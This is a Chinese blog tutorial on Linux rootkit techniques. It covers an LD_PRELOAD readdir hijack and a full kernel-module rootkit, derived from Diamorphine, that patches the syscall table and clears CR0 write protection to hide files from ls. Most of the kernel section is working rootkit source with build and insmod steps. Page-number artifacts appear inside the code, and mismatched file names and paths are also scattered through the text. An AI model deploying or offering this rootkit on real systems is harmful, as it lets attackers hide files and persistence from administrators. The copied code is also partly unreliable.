将代码编译为共享对象:gcc -shared -fPIC -o \tmp\test\libtest.so \tmp\test\test.c -ldl
在 tmp 下创建一个目录并填充项目:mkdir \tmp\ld-preload-test && cd \tmp\ld-preload-test && for i in file_1 file_2 WENDING; do touch $i; done;
运行 ls 并检查所有目录条目。
将LD_PRELOAD导出到共享对象的位置:export LD_PRELOAD=\tmp\test\libtest.so。
再次运行 ls。就会看到我们成功劫持了 readdir 函数，输出中不包含“WENDING”。
最后，通过运行unset LD_PRELOAD来取消设置环境变量。
当然这里还有个知识点！
LD_PRELOAD和\etc\ld.so.preload是不同的！

详细如下：\etc\ld.so.preload 是一个系统范围的配置文件，适用于所有进程并影响整个系统。访问此文件需要权限。另一方面，LD_PRELOAD是一个环境变量，允许单个用户为特定可执行文件或命令按进程级别指定要预加载的库。因此，使用它不需要 root 权限。由 LD_PRELOAD 定义的库会在 \etc\ld.so.preload 中的库之前加载。

内核态Rootkit（提供详细代码与实操示例）

在 Linux（以及其他类 Unix 操作系统）中，系统内存被分为两个不同的区域：用户空间和内核空间。这些空间代表不同的内存区域并具有不同的用途，为用户级应用程序与操作系统核心功能（内核）之间提供了根本性的隔离。两者之间的分离增强了系统的稳定性、安全性和整体性能；

Linux内核是操作系统的核心，它管理系统资源并为操作系统的其他部分和应用程序提供基本服务。可加载内核模块是可以动态加载到 Linux 内核中的代码片段，用于在无需重新编译内核甚至重启的情况下扩展内核的功能。例如，当你需要处理内核不支持的新文件系统类型时，你可能需要加载专门为该文件系统类型提供支持的特定内核模块。

可加载内核模块被设计为可以在运行时加载，允许内核适应不同的硬件配置，并在不重新编译或修改主内核代码的情况下支持各种设备和功能。

Linux 提供了各种命令来管理内核模块，这些命令包括：

\lib\modules\:其包含系统上安装的不同内核版本特定的内核模块和相关文件。\lib\modules\内的每个子目录对应一个特定的内核版本，并包含以下组件。它允许操作系统将不同的内核版本及其相关模块分开存放，从而在需要时更容易在内核版本之间切换。
\proc\modules:这个虚拟文件提供当前已加载内核模块的列表。文件中的每一行代表一个已加载的模块，并包含关于该模块的信息，包括其名称、大小和使用次数。
\sys\module\:这个虚拟目录提供关于当前加载的内核模块的信息。每个已加载的模块在\sys\modules\下都有自己的目录，在每个模块的目录中，有不同的文件包含关于该模块的信息。这个目录允许用户空间的进程、工具和管理员在运行时访问已加载内核模块及其属性的信息。在这里浏览以了解更多关于该目录结构的内容。
系统调用和内核函数

在我们了解攻击者如何滥用LKM之前，我们先理解下系统调用和内核函数。当用户空间程序需要执行需要与内核交互的任务时（例如，读取文件、创建网络套接字、管理进程），它必须请求内核来执行这些操作。系统调用作为用户空间和内核空间之间的接口，允许内核代表用户程序执行所请求的操作。

系统调用是一种从用户空间调用内核函数的方式，但绝大多数内核代码并未作为系统调用显露给使用者，而是供内核内部使用，以执行与管理系统资源和维护操作系统整体运行相关的各种任务。它们不是用户程序可以通过系统调用访问的标准化接口的一部分。

实操示例

getdents系统被例如ls和ps这样的程序使用，这些程序在其流程中读取目录的内容。这个系统调用通常被LKM Rootkit挂钩。还有值得注意的是，攻击者通常会挂钩filldir（或 fillonedir）内核函数，因此挂钩filldir是为了相同目的的更底层挂钩。

让我们创建一个内核模块，通过系统调用表修改方法挂钩 getdents64 系统调用，以隐藏名为“WENDING”的文件，编译它并加载它。

重要提示：

插入和移除内核模块可能会破坏内核。请确保在可丢失所有数据的一次性、非生产、非关键环境中运行此实操示例。

本实操示例适用于内核版本在 4.16.0 到 5.7.0 之间，且为 X86/X86_64 架构。

实操前等同于已读上述提示，因个人操作致使的系统崩溃，业务中断，财务等损失均与本文无关！！！！！

1.在\tmp下创建一个工作目录

mkdir \tmp\WENDING && cd \tmp\WENDING;

2.安装相关软件包，包括与你的内核匹配的内核头文件：

* 对于apt机器:运行apt install -y build-essential libncurses-dev linux-headers-$(uname -r)

* 对于基于yum机器:运行yum install -y kernel-devel-$(uname -r) && yum -y groupinstall 'Development Tools'

3. 创建一个 Makefile 并复制以下内容：

obj-m := WENDING_NB.o

CC = gcc -Wall

KDIR := \lib\modules\$(shell uname -r)\build

PWD := $(shell pwd)

all:

$(MAKE) -C $(KDIR) M=$(PWD) modules

clean:

$(MAKE) -C $(KDIR) M=$(PWD) clean

4.创建一个名为WENDING.c的文件，并复制下面的模块代码:

#include <linux/sched.h>

#include <linux/module.h>

#include <linux/syscalls.h>

#include <linux/dirent.h>

#include <linux/slab.h>

#include <linux/version.h>

#include <linux/proc_ns.h>

#include <linux/fdtable.h>

#ifndef __NR_getdents

#define __NR_getdents 141

#endif

#define MAGIC_PREFIX "WENDING"

#define MODULE_NAME " WENDING_NB"

struct linux_dirent {

unsigned long d_ino;

unsigned long d_off;

unsigned short d_reclen;

char d_name[1];

};

unsigned long cr0;

static unsigned long *__sys_call_table;

typedef asmlinkage long (*t_syscall)(const struct pt_regs *);

static t_syscall orig_getdents;

static t_syscall orig_getdents64;

unsigned long * get_syscall_table_bf(void)

{

unsigned long *syscall_table;

syscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table");

return syscall_table;

}

static asmlinkage long hacked_getdents64(const struct pt_regs *pt_regs) {

struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->si;

int ret = orig_getdents64(pt_regs), err;

unsigned long off = 0;

struct linux_dirent64 *dir, *kdirent, *prev = NULL;

if (ret <= 0)

return ret;

kdirent = kzalloc(ret, GFP_KERNEL);

if (kdirent == NULL)

return ret;

err = copy_from_user(kdirent, dirent, ret);

if (err)

goto out;

while (off < ret) {

dir = (void *)kdirent + off;

if (memcmp(MAGIC_PREFIX, dir->d_name, strlen(MAGIC_PREFIX)) == 0) {

if (dir == kdirent) {

ret -= dir->d_reclen;9/13

memmove(dir, (void *)dir + dir->d_reclen, ret);

continue;

}

prev->d_reclen += dir->d_reclen;

} else

prev = dir;

off += dir->d_reclen;

}

err = copy_to_user(dirent, kdirent, ret);

if (err)

goto out;

out:

kfree(kdirent);

return ret;

}

static asmlinkage long hacked_getdents(const struct pt_regs *pt_regs) {

struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->si;

int ret = orig_getdents(pt_regs), err;

unsigned long off = 0;

struct linux_dirent *dir, *kdirent, *prev = NULL;

if (ret <= 0)

return ret;

kdirent = kzalloc(ret, GFP_KERNEL);

if (kdirent == NULL)

return ret;

err = copy_from_user(kdirent, dirent, ret);

if (err)

goto out;

while (off < ret) {

dir = (void *)kdirent + off;

if (memcmp(MAGIC_PREFIX, dir->d_name, strlen(MAGIC_PREFIX)) == 0) {

if (dir == kdirent) {

ret -= dir->d_reclen;

memmove(dir, (void *)dir + dir->d_reclen, ret);

continue;

}

prev->d_reclen += dir->d_reclen;

} else

prev = dir;

off += dir->d_reclen;

}

err = copy_to_user(dirent, kdirent, ret);

if (err)

goto out;

out:

kfree(kdirent);

return ret;

}

static inline void write_cr0_forced(unsigned long val)10/13

{

unsigned long __force_order;

asm volatile(

"mov %0, %%cr0"

: "+r"(val), "+m"(__force_order));

}

static inline void protect_memory(void)

{

write_cr0_forced(cr0);

}

static inline void unprotect_memory(void)

{

write_cr0_forced(cr0 & ~0x00010000);

}

static int __init lkmdemo_init(void)

{

__sys_call_table = get_syscall_table_bf();

if (!__sys_call_table)

return -1;

cr0 = read_cr0();

orig_getdents = (t_syscall)__sys_call_table[__NR_getdents];

orig_getdents64 = (t_syscall)__sys_call_table[__NR_getdents64];

unprotect_memory();

__sys_call_table[__NR_getdents] = (unsigned long) hacked_getdents;

__sys_call_table[__NR_getdents64] = (unsigned long) hacked_getdents64;

protect_memory();

return 0;

}

static void __exit lkmdemo_cleanup(void)

{

unprotect_memory();

__sys_call_table[__NR_getdents] = (unsigned long) orig_getdents;

__sys_call_table[__NR_getdents64] = (unsigned long) orig_getdents64;

protect_memory();

}

module_init(lkmdemo_init);

module_exit(lkmdemo_cleanup);

MODULE_LICENSE("Dual BSD/GPL");

MODULE_AUTHOR("demo");

MODULE_DESCRIPTION("LKM rootkit based on diamorphine");

5.运行make创建 .ko 文件

6.创建一个名为WENDING的文件 touch WENDIG。

7.在工作目录上运行 ls，并在输出中看到WENDING文件。

8.加载内核模块 insmod WENDING_NB.ko。

9.再次运行 ls，我们将看到现在WENDING已从输出中隐藏。

10.运行lsmod并在输出中查看WENDING_NB。

11.卸载模块 rmmod WENDING_NB。

最后，真切的希望各位独自前行的人，坚持不弃，前方的路就在脚下！正如我司的开创教义---积跬步，至问鼎！！！

------THE END-----

参考文献:https://www.wiz.io/blog/

本文来自网友投稿或网络内容，如有侵犯您的权益请联系我们删除，联系邮箱：wyl860211@qq.com 。

可实操!Linux动态链接与内核模块的两种Rootkit技术详解

最新文章

热门文章

随机文章

可实操!Linux动态链接与内核模块的两种Rootkit技术详解

AI Agent 开发课程(Python版 )

rsync:Linux最强文件同步工具,工程师必会的高效用法

最新文章

热门文章

随机文章